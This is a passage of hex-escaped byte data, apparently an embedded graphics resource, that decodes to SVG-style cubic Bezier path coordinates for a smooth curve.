\x38\x34\x39\x31\x38\x20\x31\x30\x2e\x36\x33\x33\x33\x38\x32\x38\
\x36\x39\x20\x31\x32\x2e\x32\x35\x39\x35\x32\x39\x35\x36\x30\x36\
\x20\x31\x30\x2e\x36\x37\x30\x36\x38\x33\x35\x34\x35\x39\x20\x43\
\x20\x31\x32\x2e\x32\x36\x35\x37\x37\x30\x36\x32\x39\x34\x20\x31\
\x30\x2e\x37\x30\x37\x39\x38\x34\x32\x32\x32\x39\x20\x31\x32\x2e\
\x32\x37\x32\x30\x31\x31\x36\x39\x38\x33\x20\x31\x30\x2e\x37\x34\
\x35\x36\x36\x37\x35\x35\x31\x32\x20\x31\x32\x2e\x32\x37\x38\x32\
\x35\x32\x37\x36\x37\x31\x20\x31\x30\x2e\x37\x38\x33\x37\x30\x32\
\x32\x30\x37\x37\x20\x43\x20\x31\x32\x2e\x32\x38\x34\x34\x39\x33\
\x38\x33\x35\x39\x20\x31\x30\x2e\x38\x32\x31\x37\x33\x36\x38\x36\
\x34\x32\x20\x31\x32\x2e\x32\x39\x30\x37\x33\x34\x39\x30\x34\x38\
\x20\x31\x30\x2e\x38\x36\x30\x31\x32\x34\x39\x35\x39\x36\x20\x31\
\x32\x2e\x32\x39\x36\x39\x37\x35\x39\x37\x33\x36\x20\x31\x30\x2e\
\x38\x39\x38\x38\x33\x34\x38\x30\x32\x31\x20\x43\x20\x31\x32\x2e\
\x33\x30\x33\x32\x31\x37\x30\x34\x32\x35\x20\x31\x30\x2e\x39\x33\
\x37\x35\x34\x34\x36\x34\x34\x36\x20\x31\x32\x2e\x33\x30\x39\x34\
\x35\x38\x31\x31\x31\x33\x20\x31\x30\x2e\x39\x37\x36\x35\x37\x38\
\x31\x36\x37\x20\x31\x32\x2e\x33\x31\x35\x36\x39\x39\x31\x38\x30\
\x31\x20\x31\x31\x2e\x30\x31\x35\x39\x30\x33\x33\x35\x38\x33\x20\
\x43\x20\x31\x32\x2e\x33\x32\x31\x39\x34\x30\x32\x34\x39\x20\x31\
\x31\x2e\x30\x35\x35\x32\x32\x38\x35\x34\x39\x36\x20\x31\x32\x2e\
\x33\x32\x38\x31\x38\x31\x33\x31\x37\x38\x20\x31\x31\x2e\x30\x39\
\x34\x38\x34\x37\x31\x36\x31\x35\x20\x31\x32\x2e\x33\x33\x34\x34\
\x32\x32\x33\x38\x36\x36\x20\x31\x31\x2e\x31\x33\x34\x37\x32\x36\
\x39\x31\x33\x31\x20\x43\x20\x31\x32\x2e\x33\x34\x30\x36\x36\x33\
\x34\x35\x35\x35\x20\x31\x31\x2e\x31\x37\x34\x36\x30\x36\x36\x36\
\x34\x37\x20\x31\x32\x2e\x33\x34\x36\x39\x30\x34\x35\x32\x34\x33\
\x20\x31\x31\x2e\x32\x31\x34\x37\x34\x39\x31\x32\x34\x20\x31\x32\
\x2e\x33\x35\x33\x31\x34\x35\x35\x39\x33\x31\x20\x31\x31\x2e\x32\
\x35\x35\x31\x32\x31\x37\x39\x30\x33\x20\x43\x20\x31\x32\x2e\x33\
\x35\x39\x33\x38\x36\x36\x36\x32\x20\x31\x31\x2e\x32\x39\x35\x34\
\x39\x34\x34\x35\x36\x35\x20\x31\x32\x2e\x33\x36\x35\x36\x32\x37\
\x37\x33\x30\x38\x20\x31\x31\x2e\x33\x33\x36\x30\x39\x38\x37\x31\
\x31\x35\x20\x31\x32\x2e\x33\x37\x31\x38\x36\x38\x37\x39\x39\x36\
\x20\x31\x31\x2e\x33\x37\x36\x39\x30\x31\x38\x38\x34\x38\x20\x43\
\x20\x31\x32\x2e\x33\x37\x38\x31\x30\x39\x38\x36\x38\x35\x20\x31\
\x31\x2e\x34\x31\x37\x37\x30\x35\x30\x35\x38\x20\x31\x32\x2e\x33\
\x38\x34\x33\x35\x30\x39\x33\x37\x33\x20\x31\x31\x2e\x34\x35\x38\
\x37\x30\x38\x33\x34\x33\x31\x20\x31\x32\x2e\x33\x39\x30\x35\x39\
\x32\x30\x30\x36\x32\x20\x31\x31\x2e\x34\x39\x39\x38\x37\x38\x39\
\x35\x30\x32\x20\x43\x20\x31\x32\x2e\x33\x39\x36\x38\x33\x33\x30\
\x37\x35\x20\x31\x31\x2e\x35\x34\x31\x30\x34\x39\x35\x35\x37\x34\
\x20\x31\x32\x2e\x34\x30\x33\x30\x37\x34\x31\x34\x33\x38\x20\x31\
\x31\x2e\x35\x38\x32\x33\x38\x38\x34\x39\x30\x31\x20\x31\x32\x2e\
\x34\x30\x39\x33\x31\x35\x32\x31\x32\x37\x20\x31\x31\x2e\x36\x32\
\x33\x38\x36\x32\x38\x39\x30\x31\x20\x43\x20\x31\x32\x2e\x34\x31\
\x35\x35\x35\x36\x32\x38\x31\x35\x20\x31\x31\x2e\x36\x36\x35\x33\
\x33\x37\x32\x39\x20\x31\x32\x2e\x34\x32\x31\x37\x39\x37\x33\x35\
\x30\x33\x20\x31\x31\x2e\x37\x30\x36\x39\x34\x37\x39\x36\x39\x31\
\x20\x31\x32\x2e\x34\x32\x38\x30\x33\x38\x34\x31\x39\x32\x20\x31\
\x31\x2e\x37\x34\x38\x36\x36\x32\x30\x35\x31\x33\x20\x43\x20\x31\
\x32\x2e\x34\x33\x34\x32\x37\x39\x34\x38\x38\x20\x31\x31\x2e\x37\
\x39\x30\x33\x37\x36\x31\x33\x33\x34\x20\x31\x32\x2e\x34\x34\x30\
\x35\x32\x30\x35\x35\x36\x38\x20\x31\x31\x2e\x38\x33\x32\x31\x39\
\x34\x32\x33\x37\x35\x20\x31\x32\x2e\x34\x34\x36\x37\x36\x31\x36\
\x32\x35\x37\x20\x31\x31\x2e\x38\x37\x34\x30\x38\x33\x35\x32\x30\
\x36\x20\x43\x20\x31\x32\x2e\x34\x35\x33\x30\x30\x32\x36\x39\x34\
\x35\x20\x31\x31\x2e\x39\x31\x35\x39\x37\x32\x38\x30\x33\x37\x20\
\x31\x32\x2e\x34\x35\x39\x32\x34\x33\x37\x36\x33\x34\x20\x31\x31\
\x2e\x39\x35\x37\x39\x33\x33\x36\x39\x30\x39\x20\x31\x32\x2e\x34\
\x36\x35\x34\x38\x34\x38\x33\x32\x32\x20\x31\x31\x2e\x39\x39\x39\
\x39\x33\x33\x34\x32\x33\x20\x43\x20\x31\x32\x2e\x34\x37\x31\x37\
\x32\x35\x39\x30\x31\x20\x31\x32\x2e\x30\x34\x31\x39\x33\x33\x31\
\x35\x35\x31\x20\x31\x32\x2e\x34\x37\x37\x39\x36\x36\x39\x36\x39\
\x39\x20\x31\x32\x2e\x30\x38\x33\x39\x37\x31\x39\x36\x32\x37\x20\
\x31\x32\x2e\x34\x38\x34\x32\x30\x38\x30\x33\x38\x37\x20\x31\x32\
\x2e\x31\x32\x36\x30\x31\x37\x32\x32\x31\x31\x20\x43\x20\x31\x32\
\x2e\x34\x39\x30\x34\x34\x39\x31\x30\x37\x35\x20\x31\x32\x2e\x31\
\x36\x38\x30\x36\x32\x34\x37\x39\x34\x20\x31\x32\x2e\x34\x39\x36\
\x36\x39\x30\x31\x37\x36\x34\x20\x31\x32\x2e\x32\x31\x30\x31\x31\
\x34\x32\x32\x34\x32\x20\x31\x32\x2e\x35\x30\x32\x39\x33\x31\x32\
\x34\x35\x32\x20\x31\x32\x2e\x32\x35\x32\x31\x34\x30\x30\x31\x35\
\x38\x20\x43\x20\x31\x32\x2e\x35\x30\x39\x31\x37\x32\x33\x31\x34\
\x20\x31\x32\x2e\x32\x39\x34\x31\x36\x35\x38\x30\x37\x33\x20\x31\
\x32\x2e\x35\x31\x35\x34\x31\x33\x33\x38\x32\x39\x20\x31\x32\x2e\
\x33\x33\x36\x31\x36\x35\x34\x38\x36\x32\x20\x31\x32\x2e\x35\x32\
\x31\x36\x35\x34\x34\x35\x31\x37\x20\x31\x32\x2e\x33\x37\x38\x31\
\x30\x36\x38\x34\x37\x39\x20\x43\x20\x31\x32\x2e\x35\x32\x37\x38\
\x39\x35\x35\x32\x30\x36\x20\x31\x32\x2e\x34\x32\x30\x30\x34\x38\
\x32\x30\x39\x35\x20\x31\x32\x2e\x35\x33\x34\x31\x33\x36\x35\x38\
\x39\x34\x20\x31\x32\x2e\x34\x36\x31\x39\x33\x30\x39\x20\x31\x32\
\x2e\x35\x34\x30\x33\x37\x37\x36\x35\x38\x32\x20\x31\x32\x2e\x35\
\x30\x33\x37\x32\x32\x39\x39\x39\x33\x20\x43\x20\x31\x32\x2e\x35\
\x34\x36\x36\x31\x38\x37\x32\x37\x31\x20\x31\x32\x2e\x35\x34\x35\
\x35\x31\x35\x30\x39\x38\x36\x20\x31\x32\x2e\x35\x35\x32\x38\x35\
\x39\x37\x39\x35\x39\x20\x31\x32\x2e\x35\x38\x37\x32\x31\x36\x30\
\x35\x38\x37\x20\x31\x32\x2e\x35\x35\x39\x31\x30\x30\x38\x36\x34\
\x37\x20\x31\x32\x2e\x36\x32\x38\x37\x39\x34\x32\x39\x33\x39\x20\
\x43\x20\x31\x32\x2e\x35\x36\x35\x33\x34\x31\x39\x33\x33\x36\x20\
\x31\x32\x2e\x36\x37\x30\x33\x37\x32\x35\x32\x39\x31\x20\x31\x32\
\x2e\x35\x37\x31\x35\x38\x33\x30\x30\x32\x34\x20\x31\x32\x2e\x37\
\x31\x31\x38\x32\x37\x32\x39\x38\x20\x31\x32\x2e\x35\x37\x37\x38\
\x32\x34\x30\x37\x31\x32\x20\x31\x32\x2e\x37\x35\x33\x31\x32\x37\
\x33\x39\x37\x39\x20\x43\x20\x31\x32\x2e\x35\x38\x34\x30\x36\x35\
\x31\x34\x30\x31\x20\x31\x32\x2e\x37\x39\x34\x34\x32\x37\x34\x39\
\x37\x38\x20\x31\x32\x2e\x35\x39\x30\x33\x30\x36\x32\x30\x38\x39\
\x20\x31\x32\x2e\x38\x33\x35\x35\x37\x31\x39\x39\x35\x31\x20\x31\
\x32\x2e\x35\x39\x36\x35\x34\x37\x32\x37\x37\x37\x20\x31\x32\x2e\
\x38\x37\x36\x35\x33\x30\x31\x31\x38\x35\x20\x43\x20\x31\x32\x2e\
\x36\x30\x32\x37\x38\x38\x33\x34\x36\x36\x20\x31\x32\x2e\x39\x31\
\x37\x34\x38\x38\x32\x34\x31\x38\x20\x31\x32\x2e\x36\x30\x39\x30\
\x32\x39\x34\x31\x35\x34\x20\x31\x32\x2e\x39\x35\x38\x32\x35\x38\
\x38\x36\x36\x39\x20\x31\x32\x2e\x36\x31\x35\x32\x37\x30\x34\x38\
\x34\x33\x20\x31\x32\x2e\x39\x39\x38\x38\x31\x31\x37\x30\x31\x31\
\x20\x43\x20\x31\x32\x2e\x36\x32\x31\x35\x31\x31\x35\x35\x33\x31\
\x20\x31\x33\x2e\x30\x33\x39\x33\x36\x34\x35\x33\x35\x32\x20\x31\
\x32\x2e\x36\x32\x37\x37\x35\x32\x36\x32\x31\x39\x20\x31\x33\x2e\
\x30\x37\x39\x36\x39\x38\x32\x36\x35\x33\x20\x31\x32\x2e\x36\x33\
\x33\x39\x39\x33\x36\x39\x30\x38\x20\x31\x33\x2e\x31\x31\x39\x37\
\x38\x33\x31\x32\x34\x32\x20\x43\x20\x31\x32\x2e\x36\x34\x30\x32\
\x33\x34\x37\x35\x39\x36\x20\x31\x33\x2e\x31\x35\x39\x38\x36\x37\
\x39\x38\x33\x31\x20\x31\x32\x2e\x36\x34\x36\x34\x37\x35\x38\x32\
\x38\x34\x20\x31\x33\x2e\x31\x39\x39\x37\x30\x32\x34\x37\x30\x36\
\x20\x31\x32\x2e\x36\x35\x32\x37\x31\x36\x38\x39\x37\x33\x20\x31\
\x33\x2e\x32\x33\x39\x32\x35\x37\x33\x39\x31\x35\x20\x43\x20\x31\
\x32\x2e\x36\x35\x38\x39\x35\x37\x39\x36\x36\x31\x20\x31\x33\x2e\
\x32\x37\x38\x38\x31\x32\x33\x31\x32\x33\x20\x31\x32\x2e\x36\x36\
\x35\x31\x39\x39\x30\x33\x34\x39\x20\x31\x33\x2e\x33\x31\x38\x30\
\x38\x35\x39\x38\x31\x37\x20\x31\x32\x2e\x36\x37\x31\x34\x34\x30\
\x31\x30\x33\x38\x20\x31\x33\x2e\x33\x35\x37\x30\x34\x39\x38\x32\
\x30\x39\x20\x43\x20\x31\x32\x2e\x36\x37\x37\x36\x38\x31\x31\x37\
\x32\x36\x20\x31\x33\x2e\x33\x39\x36\x30\x31\x33\x36\x36\x30\x32\
\x20\x31\x32\x2e\x36\x38\x33\x39\x32\x32\x32\x34\x31\x35\x20\x31\
\x33\x2e\x34\x33\x34\x36\x36\x35\x38\x30\x32\x36\x20\x31\x32\x2e\
\x36\x39\x30\x31\x36\x33\x33\x31\x30\x33\x20\x31\x33\x2e\x34\x37\
\x32\x39\x37\x38\x33\x33\x30\x33\x20\x43\x20\x31\x32\x2e\x36\x39\
\x36\x34\x30\x34\x33\x37\x39\x31\x20\x31\x33\x2e\x35\x31\x31\x32\
\x39\x30\x38\x35\x38\x31\x20\x31\x32\x2e\x37\x30\x32\x36\x34\x35\
\x34\x34\x38\x20\x31\x33\x2e\x35\x34\x39\x32\x36\x31\x37\x32\x35\
\x34\x20\x31\x32\x2e\x37\x30\x38\x38\x38\x36\x35\x31\x36\x38\x20\
\x31\x33\x2e\x35\x38\x36\x38\x36\x33\x37\x31\x38\x36\x20\x43\x20\
\x31\x32\x2e\x37\x31\x35\x31\x32\x37\x35\x38\x35\x36\x20\x31\x33\
\x2e\x36\x32\x34\x34\x36\x35\x37\x31\x31\x38\x20\x31\x32\x2e\x37\
\x32\x31\x33\x36\x38\x36\x35\x34\x35\x20\x31\x33\x2e\x36\x36\x31\
\x36\x39\x36\x36\x30\x39\x31\x20\x31\x32\x2e\x37\x32\x37\x36\x30\
\x39\x37\x32\x33\x33\x20\x31\x33\x2e\x36\x39\x38\x35\x32\x39\x39\
\x34\x33\x20\x43\x20\x31\x32\x2e\x37\x33\x33\x38\x35\x30\x37\x39\
\x32\x31\x20\x31\x33\x2e\x37\x33\x35\x33\x36\x33\x32\x37\x36\x39\
\x20\x31\x32\x2e\x37\x34\x30\x30\x39\x31\x38\x36\x31\x20\x31\x33\
\x2e\x37\x37\x31\x37\x39\x36\x36\x35\x33\x31\x20\x31\x32\x2e\x37\
\x34\x36\x33\x33\x32\x39\x32\x39\x38\x20\x31\x33\x2e\x38\x30\x37\
\x38\x30\x34\x33\x39\x31\x31\x20\x43\x20\x31\x32\x2e\x37\x35\x32\
\x35\x37\x33\x39\x39\x38\x36\x20\x31\x33\x2e\x38\x34\x33\x38\x31\
\x32\x31\x32\x39\x31\x20\x31\x32\x2e\x37\x35\x38\x38\x31\x35\x30\
\x36\x37\x35\x20\x31\x33\x2e\x38\x37\x39\x33\x39\x31\x36\x36\x35\
\x38\x20\x31\x32\x2e\x37\x36\x35\x30\x35\x36\x31\x33\x36\x33\x20\
\x31\x33\x2e\x39\x31\x34\x35\x31\x38\x31\x34\x37\x36\x20\x43\x20\
\x31\x32\x2e\x37\x37\x31\x32\x39\x37\x32\x30\x35\x32\x20\x31\x33\
\x2e\x39\x34\x39\x36\x34\x34\x36\x32\x39\x34\x20\x31\x32\x2e\x37\
\x37\x37\x35\x33\x38\x32\x37\x34\x20\x31\x33\x2e\x39\x38\x34\x33\
\x31\x35\x33\x32\x38\x32\x20\x31\x32\x2e\x37\x38\x33\x37\x37\x39\
\x33\x34\x32\x38\x20\x31\x34\x2e\x30\x31\x38\x35\x30\x36\x32\x35\
\x35\x36\x20\x43\x20\x31\x32\x2e\x37\x39\x30\x30\x32\x30\x34\x31\
\x31\x37\x20\x31\x34\x2e\x30\x35\x32\x36\x39\x37\x31\x38\x33\x20\
\x31\x32\x2e\x37\x39\x36\x32\x36\x31\x34\x38\x30\x35\x20\x31\x34\
\x2e\x30\x38\x36\x34\x30\x35\x34\x35\x30\x33\x20\x31\x32\x2e\x38\
\x30\x32\x35\x30\x32\x35\x34\x39\x33\x20\x31\x34\x2e\x31\x31\x39\
\x36\x30\x37\x39\x37\x31\x33\x20\x43\x20\x31\x32\x2e\x38\x30\x38\
\x37\x34\x33\x36\x31\x38\x32\x20\x31\x34\x2e\x31\x35\x32\x38\x31\
\x30\x34\x39\x32\x34\x20\x31\x32\x2e\x38\x31\x34\x39\x38\x34\x36\
\x38\x37\x20\x31\x34\x2e\x31\x38\x35\x35\x30\x34\x32\x32\x32\x33\
\x20\x31\x32\x2e\x38\x32\x31\x32\x32\x35\x37\x35\x35\x38\x20\x31\
\x34\x2e\x32\x31\x37\x36\x36\x37\x30\x31\x32\x39\x20\x43\x20\x31\
\x32\x2e\x38\x32\x37\x34\x36\x36\x38\x32\x34\x37\x20\x31\x34\x2e\
\x32\x34\x39\x38\x32\x39\x38\x30\x33\x36\x20\x31\x32\x2e\x38\x33\
\x33\x37\x30\x37\x38\x39\x33\x35\x20\x31\x34\x2e\x32\x38\x31\x34\
\x35\x38\x34\x35\x38\x35\x20\x31\x32\x2e\x38\x33\x39\x39\x34\x38\
\x39\x36\x32\x34\x20\x31\x34\x2e\x33\x31\x32\x35\x33\x31\x38\x30\
\x31\x38\x20\x43\x20\x31\x32\x2e\x38\x34\x36\x31\x39\x30\x30\x33\
\x31\x32\x20\x31\x34\x2e\x33\x34\x33\x36\x30\x35\x31\x34\x35\x31\
\x20\x31\x32\x2e\x38\x35\x32\x34\x33\x31\x31\x20\x31\x34\x2e\x33\
\x37\x34\x31\x31\x39\x38\x33\x33\x39\x20\x31\x32\x2e\x38\x35\x38\
\x36\x37\x32\x31\x36\x38\x39\x20\x31\x34\x2e\x34\x30\x34\x30\x35\
\x35\x36\x39\x37\x20\x43\x20\x31\x32\x2e\x38\x36\x34\x39\x31\x33\
\x32\x33\x37\x37\x20\x31\x34\x2e\x34\x33\x33\x39\x39\x31\x35\x36\
\x30\x31\x20\x31\x32\x2e\x38\x37\x31\x31\x35\x34\x33\x30\x36\x35\
\x20\x31\x34\x2e\x34\x36\x33\x33\x34\x35\x31\x31\x33\x34\x20\x31\
\x32\x2e\x38\x37\x37\x33\x39\x35\x33\x37\x35\x34\x20\x31\x34\x2e\
\x34\x39\x32\x30\x39\x37\x32\x32\x31\x39\x20\x43\x20\x31\x32\x2e\
\x38\x38\x33\x36\x33\x36\x34\x34\x34\x32\x20\x31\x34\x2e\x35\x32\
\x30\x38\x34\x39\x33\x33\x30\x33\x20\x31\x32\x2e\x38\x38\x39\x38\
\x37\x37\x35\x31\x33\x20\x31\x34\x2e\x35\x34\x38\x39\x39\x36\x33\
\x37\x33\x37\x20\x31\x32\x2e\x38\x39\x36\x31\x31\x38\x35\x38\x31\
\x39\x20\x31\x34\x2e\x35\x37\x36\x35\x32\x30\x32\x38\x32\x38\x20\
\x43\x20\x31\x32\x2e\x39\x30\x32\x33\x35\x39\x36\x35\x30\x37\x20\
\x31\x34\x2e\x36\x30\x34\x30\x34\x34\x31\x39\x31\x38\x20\x31\x32\
\x2e\x39\x30\x38\x36\x30\x30\x37\x31\x39\x35\x20\x31\x34\x2e\x36\
\x33\x30\x39\x34\x31\x32\x31\x36\x20\x31\x32\x2e\x39\x31\x34\x38\
\x34\x31\x37\x38\x38\x34\x20\x31\x34\x2e\x36\x35\x37\x31\x39\x34\
\x33\x37\x39\x35\x20\x43\x20\x31\x32\x2e\x39\x32\x31\x30\x38\x32\
\x38\x35\x37\x32\x20\x31\x34\x2e\x36\x38\x33\x34\x34\x37\x35\x34\
\x33\x20\x31\x32\x2e\x39\x32\x37\x33\x32\x33\x39\x32\x36\x31\x20\
\x31\x34\x2e\x37\x30\x39\x30\x35\x32\x39\x37\x30\x37\x20\x31\x32\
\x2e\x39\x33\x33\x35\x36\x34\x39\x39\x34\x39\x20\x31\x34\x2e\x37\
\x33\x33\x39\x39\x34\x38\x30\x36\x38\x20\x43\x20\x31\x32\x2e\x39\
\x33\x39\x38\x30\x36\x30\x36\x33\x37\x20\x31\x34\x2e\x37\x35\x38\
\x39\x33\x36\x36\x34\x33\x20\x31\x32\x2e\x39\x34\x36\x30\x34\x37\
\x31\x33\x32\x36\x20\x31\x34\x2e\x37\x38\x33\x32\x31\x30\x38\x39\
\x33\x37\x20\x31\x32\x2e\x39\x35\x32\x32\x38\x38\x32\x30\x31\x34\
\x20\x31\x34\x2e\x38\x30\x36\x38\x30\x32\x38\x34\x37\x36\x20\x43\
\x20\x31\x32\x2e\x39\x35\x38\x35\x32\x39\x32\x37\x30\x32\x20\x31\
\x34\x2e\x38\x33\x30\x33\x39\x34\x38\x30\x31\x35\x20\x31\x32\x2e\
\x39\x36\x34\x37\x37\x30\x33\x33\x39\x31\x20\x31\x34\x2e\x38\x35\
\x33\x33\x30\x30\x33\x35\x32\x34\x20\x31\x32\x2e\x39\x37\x31\x30\
\x31\x31\x34\x30\x37\x39\x20\x31\x34\x2e\x38\x37\x35\x35\x30\x35\
\x39\x35\x35\x39\x20\x43\x20\x31\x32\x2e\x39\x37\x37\x32\x35\x32\
\x34\x37\x36\x37\x20\x31\x34\x2e\x38\x39\x37\x37\x31\x31\x35\x35\
\x39\x34\x20\x31\x32\x2e\x39\x38\x33\x34\x39\x33\x35\x34\x35\x36\
\x20\x31\x34\x2e\x39\x31\x39\x32\x31\x33\x30\x30\x33\x33\x20\x31\
\x32\x2e\x39\x38\x39\x37\x33\x34\x36\x31\x34\x34\x20\x31\x34\x2e\
\x39\x33\x39\x39\x39\x37\x39\x33\x31\x32\x20\x43\x20\x31\x32\x2e\
\x39\x39\x35\x39\x37\x35\x36\x38\x33\x33\x20\x31\x34\x2e\x39\x36\
\x30\x37\x38\x32\x38\x35\x39\x31\x20\x31\x33\x2e\x30\x30\x32\x32\
\x31\x36\x37\x35\x32\x31\x20\x31\x34\x2e\x39\x38\x30\x38\x34\x36\
\x39\x35\x39\x33\x20\x31\x33\x2e\x30\x30\x38\x34\x35\x37\x38\x32\
\x30\x39\x20\x31\x35\x2e\x30\x30\x30\x31\x37\x39\x30\x38\x32\x35\
\x20\x43\x20\x31\x33\x2e\x30\x31\x34\x36\x39\x38\x38\x38\x39\x38\
\x20\x31\x35\x2e\x30\x31\x39\x35\x31\x31\x32\x30\x35\x38\x20\x31\
\x33\x2e\x30\x32\x30\x39\x33\x39\x39\x35\x38\x36\x20\x31\x35\x2e\
\x30\x33\x38\x31\x30\x36\x39\x34\x37\x33\x20\x31\x33\x2e\x30\x32\
\x37\x31\x38\x31\x30\x32\x37\x34\x20\x31\x35\x2e\x30\x35\x35\x39\
\x35\x36\x33\x38\x32\x35\x20\x43\x20\x31\x33\x2e\x30\x33\x33\x34\
\x32\x32\x30\x39\x36\x33\x20\x31\x35\x2e\x30\x37\x33\x38\x30\x35\
\x38\x31\x37\x36\x20\x31\x33\x2e\x30\x33\x39\x36\x36\x33\x31\x36\
\x35\x31\x20\x31\x35\x2e\x30\x39\x30\x39\x30\x34\x34\x35\x35\x35\
\x20\x31\x33\x2e\x30\x34\x35\x39\x30\x34\x32\x33\x33\x39\x20\x31\
\x35\x2e\x31\x30\x37\x32\x34\x33\x36\x31\x31\x32\x20\x43\x20\x31\
\x33\x2e\x30\x35\x32\x31\x34\x35\x33\x30\x32\x38\x20\x31\x35\x2e\
\x31\x32\x33\x35\x38\x32\x37\x36\x36\x38\x20\x31\x33\x2e\x30\x35\
\x38\x33\x38\x36\x33\x37\x31\x36\x20\x31\x35\x2e\x31\x33\x39\x31\
\x35\x37\x38\x37\x30\x31\x20\x31\x33\x2e\x30\x36\x34\x36\x32\x37\
\x34\x34\x30\x35\x20\x31\x35\x2e\x31\x35\x33\x39\x36\x31\x34\x38\
\x39\x33\x20\x43\x20\x31\x33\x2e\x30\x37\x30\x38\x36\x38\x35\x30\
\x39\x33\x20\x31\x35\x2e\x31\x36\x38\x37\x36\x35\x31\x30\x38\x35\
\x20\x31\x33\x2e\x30\x37\x37\x31\x30\x39\x35\x37\x38\x31\x20\x31\
\x35\x2e\x31\x38\x32\x37\x39\x32\x36\x30\x31\x34\x20\x31\x33\x2e\
\x30\x38\x33\x33\x35\x30\x36\x34\x37\x20\x31\x35\x2e\x31\x39\x36\
\x30\x33\x37\x38\x30\x30\x39\x20\x43\x20\x31\x33\x2e\x30\x38\x39\
\x35\x39\x31\x37\x31\x35\x38\x20\x31\x35\x2e\x32\x30\x39\x32\x38\
\x33\x30\x30\x30\x34\x20\x31\x33\x2e\x30\x39\x35\x38\x33\x32\x37\
\x38\x34\x36\x20\x31\x35\x2e\x32\x32\x31\x37\x34\x31\x31\x39\x39\
\x35\x20\x31\x33\x2e\x31\x30\x32\x30\x37\x33\x38\x35\x33\x35\x20\
\x31\x35\x2e\x32\x33\x33\x34\x30\x37\x35\x30\x35\x20\x43\x20\x31\
\x33\x2e\x31\x30\x38\x33\x31\x34\x39\x32\x32\x33\x20\x31\x35\x2e\
\x32\x34\x35\x30\x37\x33\x38\x31\x30\x35\x20\x31\x33\x2e\x31\x31\
\x34\x35\x35\x35\x39\x39\x31\x31\x20\x31\x35\x2e\x32\x35\x35\x39\
\x34\x33\x34\x35\x37\x38\x20\x31\x33\x2e\x31\x32\x30\x37\x39\x37\
\x30\x36\x20\x31\x35\x2e\x32\x36\x36\x30\x31\x32\x38\x33\x35\x37\
\x20\x43\x20\x31\x33\x2e\x31\x32\x37\x30\x33\x38\x31\x32\x38\x38\
\x20\x31\x35\x2e\x32\x37\x36\x30\x38\x32\x32\x31\x33\x36\x20\x31\
\x33\x2e\x31\x33\x33\x32\x37\x39\x31\x39\x37\x36\x20\x31\x35\x2e\
\x32\x38\x35\x33\x34\x36\x35\x30\x37\x31\x20\x31\x33\x2e\x31\x33\
\x39\x35\x32\x30\x32\x36\x36\x35\x20\x31\x35\x2e\x32\x39\x33\x38\
\x30\x33\x33\x39\x32\x32\x20\x43\x20\x31\x33\x2e\x31\x34\x35\x37\
\x36\x31\x33\x33\x35\x33\x20\x31\x35\x2e\x33\x30\x32\x32\x36\x30\
\x32\x37\x37\x33\x20\x31\x33\x2e\x31\x35\x32\x30\x30\x32\x34\x30\
\x34\x32\x20\x31\x35\x2e\x33\x30\x39\x39\x30\x34\x38\x39\x36\x32\
\x20\x31\x33\x2e\x31\x35\x38\x32\x34\x33\x34\x37\x33\x20\x31\x35\
\x2e\x33\x31\x36\x37\x33\x36\x32\x31\x36\x20\x43\x20\x31\x33\x2e\
\x31\x36\x34\x34\x38\x34\x35\x34\x31\x38\x20\x31\x35\x2e\x33\x32\
\x33\x35\x36\x37\x35\x33\x35\x38\x20\x31\x33\x2e\x31\x37\x30\x37\
\x32\x35\x36\x31\x30\x37\x20\x31\x35\x2e\x33\x32\x39\x35\x38\x30\
\x36\x36\x33\x33\x20\x31\x33\x2e\x31\x37\x36\x39\x36\x36\x36\x37\
\x39\x35\x20\x31\x35\x2e\x33\x33\x34\x37\x37\x35\x38\x35\x38\x20\
\x43\x20\x31\x33\x2e\x31\x38\x33\x32\x30\x37\x37\x34\x38\x33\x20\
\x31\x35\x2e\x33\x33\x39\x39\x37\x31\x30\x35\x32\x37\x20\x31\x33\
\x2e\x31\x38\x39\x34\x34\x38\x38\x31\x37\x32\x20\x31\x35\x2e\x33\
\x34\x34\x33\x34\x33\x33\x39\x33\x37\x20\x31\x33\x2e\x31\x39\x35\
\x36\x38\x39\x38\x38\x36\x20\x31\x35\x2e\x33\x34\x37\x38\x39\x34\
\x34\x33\x32\x36\x20\x43\x20\x31\x33\x2e\x32\x30\x31\x39\x33\x30\
\x39\x35\x34\x38\x20\x31\x35\x2e\x33\x35\x31\x34\x34\x35\x34\x37\
\x31\x34\x20\x31\x33\x2e\x32\x30\x38\x31\x37\x32\x30\x32\x33\x37\
\x20\x31\x35\x2e\x33\x35\x34\x31\x37\x30\x32\x36\x37\x32\x20\x31\
\x33\x2e\x32\x31\x34\x34\x31\x33\x30\x39\x32\x35\x20\x31\x35\x2e\
\x33\x35\x36\x30\x37\x31\x36\x36\x31\x32\x20\x43\x20\x31\x33\x2e\
\x32\x32\x30\x36\x35\x34\x31\x36\x31\x34\x20\x31\x35\x2e\x33\x35\
\x37\x39\x37\x33\x30\x35\x35\x31\x20\x31\x33\x2e\x32\x32\x36\x38\
\x39\x35\x32\x33\x30\x32\x20\x31\x35\x2e\x33\x35\x39\x30\x34\x36\
\x30\x39\x33\x38\x20\x31\x33\x2e\x32\x33\x33\x31\x33\x36\x32\x39\
\x39\x20\x31\x35\x2e\x33\x35\x39\x32\x39\x34\x39\x30\x33\x36\x20\
\x43\x20\x31\x33\x2e\x32\x33\x39\x33\x37\x37\x33\x36\x37\x39\x20\
\x31\x35\x2e\x33\x35\x39\x35\x34\x33\x37\x31\x33\x35\x20\x31\x33\
\x2e\x32\x34\x35\x36\x31\x38\x34\x33\x36\x37\x20\x31\x35\x2e\x33\
\x35\x38\x39\x36\x33\x33\x33\x36\x32\x20\x31\x33\x2e\x32\x35\x31\
\x38\x35\x39\x35\x30\x35\x35\x20\x31\x35\x2e\x33\x35\x37\x35\x35\
\x39\x31\x37\x37\x34\x20\x43\x20\x31\x33\x2e\x32\x35\x38\x31\x30\
\x30\x35\x37\x34\x34\x20\x31\x35\x2e\x33\x35\x36\x31\x35\x35\x30\
\x31\x38\x35\x20\x31\x33\x2e\x32\x36\x34\x33\x34\x31\x36\x34\x33\
\x32\x20\x31\x35\x2e\x33\x35\x33\x39\x32\x32\x31\x32\x32\x35\x20\
\x31\x33\x2e\x32\x37\x30\x35\x38\x32\x37\x31\x32\x20\x31\x35\x2e\
\x33\x35\x30\x38\x36\x37\x31\x36\x35\x35\x20\x43\x20\x31\x33\x2e\
\x32\x37\x36\x38\x32\x33\x37\x38\x30\x39\x20\x31\x35\x2e\x33\x34\
\x37\x38\x31\x32\x32\x30\x38\x35\x20\x31\x33\x2e\x32\x38\x33\x30\
